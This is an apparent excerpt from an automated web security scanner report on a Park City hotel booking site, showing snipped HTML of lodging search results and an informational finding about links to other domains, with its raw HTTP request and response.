php?group_id=982&cloneID=41&catID=103&eventID=1572&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1572]); ><img src="http://s3.amazonaws.com/book_direct_images/l_8984bb33e54bd9d2372be2edbef9a879.jpg" title="Mountain Reservations"></a>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_8cac98caac9e39e1546d762321dffb03.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43865&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',43865]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43865&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1456]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1456]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=43865&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176193&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176193]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176193&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176193&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175981]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175973&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175973]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175973&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1450]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1450]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175973&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176197&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176197]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176197&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176197&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175975&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175975]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175975&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1450]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1450]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175975&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176198&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176198]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176198&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176198&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175982]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176196]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176192]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176229&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176229]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176229&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176229&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175974&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175974]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175974&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1450]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1450]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175974&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_8cac98caac9e39e1546d762321dffb03.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43867&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',43867]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43867&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1456]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1456]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=43867&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176194]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175627]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/footer_jackrabbit.cfm" width="100%" height="75" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div id="page_footer" style="padding-bottom:25px; color:#444; font-size:11px;"><a href="http://www.jackrabbitsystems.com/" target="_blank" style="color:#444; font-size:11px;"><img src="http://www.jackrabbitsystems.com/images/trip_images/powered_by_jackrabbit.png" name="powered_by_img" id="powered_by_img" style="border:none;"></a>
...[SNIP]...

5.5. http://parkcitytrips.com/booking_results.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0th7cv2nkmuqi1ajs3h27q70g6; path=/
Connection: close
Content-Length: 372688


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
</title>
                   <link rel="stylesheet" type="text/css" href="http://www.prod.bookdirect.net/css/smoothness/jquery-ui-1.7.2.custom.css" />
                   
                                       <link rel="stylesheet" type="text/css" href="/css/parkcity_template.css" />
                                       
                   <script src="http://maps.google.com/maps?file=api&amp;v=2.109&amp;key=ABQIAAAAKZm_5hsUqOpv5DxPV4HooBROL83n-bgKgORxim6v55hn_ZaBnxSpV4rEbp2tOu1bjGh1t-gicIUDyw" type="text/javascript"></script>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/header_jackrabbit.cfm" width="100%" height="115" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/8fa9e98acf5e2b247caa70669df6c903.png' title='Parking' alt='Parking' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Parking']); toggle_amenity('4', 'aa5d43508b4cec0724f75af8ae868ca6.png', '8fa9e98acf5e2b247caa70669df6c903.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/1fc82576cbb0bcebaf66b495707dd675.png' title='Shuttle Service' alt='Shuttle Service' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Shuttle Service']); toggle_amenity('1', '4a91a9bdeccb5f084339608bb1039e67.png', '1fc82576cbb0bcebaf66b495707dd675.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/90d28b770896393a5d24deaa76adf104.png' title='Pets Allowed' alt='Pets Allowed' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Pets Allowed']); toggle_amenity('31', '9ce03aac14ae7f31e817e122d6f60bd4.png', '90d28b770896393a5d24deaa76adf104.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/45a53ad2386da6db59cbd753481a4ceb.png' title='Swimming Pool' alt='Swimming Pool' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Swimming Pool']); toggle_amenity('6', '73a521715679621c1f544cd26c6075d0.png', '45a53ad2386da6db59cbd753481a4ceb.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/071c76db840ec89a0ee32b4e813b2f88.png' title='Fitness Room' alt='Fitness Room' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Fitness Room']); toggle_amenity('2', '686566e8aaab6172c31b1f6b470c6e3b.png', '071c76db840ec89a0ee32b4e813b2f88.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/20b34cc2545d9bbfc011472d08597e19.png' title='Restaurants' alt='Restaurants' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Restaurants']); toggle_amenity('7', '042de5248e8fa72df3c87db8fc48345b.png', '20b34cc2545d9bbfc011472d08597e19.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/462fdff39e49769ef18a4e9c44691760.png' title='High Speed Internet' alt='High Speed Internet' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','High Speed Internet']); toggle_amenity('3', 'bfa9115d65ee2e68af501bd7cc5ac344.png', '462fdff39e49769ef18a4e9c44691760.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1426&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1426]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a11a7104ddd179b256e77fe3f0c22d0a.jpg" title="Resorts West"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1389&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1389]); ><img src="http://s3.amazonaws.com/book_direct_images/l_014e8136e32c6e08fc4c5c410d3fa4b8.jpg" title="Woodside Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1431&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1431]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a6a81cccd7ebdf5fb4ea5b8f947bb2ad.jpg" title="Westgate Park City Resort & Spa"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1432&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1432]); ><img src="http://s3.amazonaws.com/book_direct_images/l_63a19802a5b81e8243fa8be9beb55177.jpg" title="The Chateaux at Silver Lake"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1421&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1421]); ><img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" title="Hotel Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1430&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1430]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a4d89b68f8b48f521b0e56530a06e1a3.jpg" title="Yarrow Resort Hotel and Conference"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1456&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1456]); ><img src="http://s3.amazonaws.com/book_direct_images/l_8cac98caac9e39e1546d762321dffb03.jpg" title="Hampton Inn & Suites Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1455&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1455]); ><img src="http://s3.amazonaws.com/book_direct_images/l_6c7dd3e7c036e97661e0daff81f68ca3.jpg" title="Best Western Landmark Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1453&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1453]); ><img src="http://s3.amazonaws.com/book_direct_images/l_2a733136b1c01bbb4f6f69765b281ea2.jpg" title="Goldener Hirsch Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=7369&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',7369]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4479851d723539b1b9aafdc8788733a5.jpg" title="Waldorf Astoria Park City"></a>
...[SNIP]...
